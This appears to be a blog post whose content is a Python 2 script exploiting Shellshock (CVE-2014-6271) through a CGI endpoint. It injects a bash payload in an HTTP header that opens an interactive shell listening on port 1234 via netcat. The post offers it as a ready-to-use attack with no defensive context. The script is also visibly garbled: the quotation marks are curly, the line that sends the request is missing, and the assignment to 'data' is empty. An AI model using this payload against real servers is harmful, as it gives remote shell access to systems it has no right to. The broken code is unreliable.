CVE-2014-6271 cgi-bin reverse shell (shellshock)

#CVE-2014-6271 cgi-bin reverse shell
import httplib,urllib,sys
if (len(sys.argv)<3):
        print “Usage: %s <host> <vulnerable CGI>” % sys.argv[0]
        print “Example: %s localhost /cgi-bin/test.cgi” % sys.argv[0]
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell=“() { ignored;};/bin/bash -c ‘/bin/rm -f /tmp/f; /usr/bin/mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f'”
headers = {“Content-type”: “application/x-www-form-urlencoded”,
        “test”:reverse_shell }
res = conn.getresponse()
print res.status, res.reason
data =
print data

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.